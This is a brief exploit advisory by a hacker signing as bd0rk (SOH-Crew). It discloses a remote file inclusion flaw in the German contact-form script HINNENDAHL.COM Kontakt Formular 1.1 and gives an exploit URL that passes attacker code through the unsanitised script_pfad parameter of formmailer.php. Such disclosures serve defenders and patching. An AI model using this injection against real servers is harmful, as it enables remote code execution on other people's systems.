# #
# HINNENDAHL.COM Kontakt Formular 1.1 (formmailer.php) #
# #
# Remote File Inclusion Vulnerability #
# #
# by bd0rk || SOH-Crew # # #
# www.soh-crew.it.tt #
# #
# Contact: bd0rk[at]hackermail.com #
# #
[~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1
[~] Vendor: http://www.hinnendahl.com/
[~] Download: http://www.hinnendahl.com/index.php?seite=download
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
Description: The $script_pfad parameter in /kontaktformular/formmailer.php
isn't declared before require. So an attacker can execute some
php-shellcode about it. (line 2 - 3)
[+]Exploit: http://www.example.com/kontaktformular/formmailer.php?script_pfad=[Ev!LC0de]
### The 21 years old, german Hacker bd0rk ### <---white-hat :-)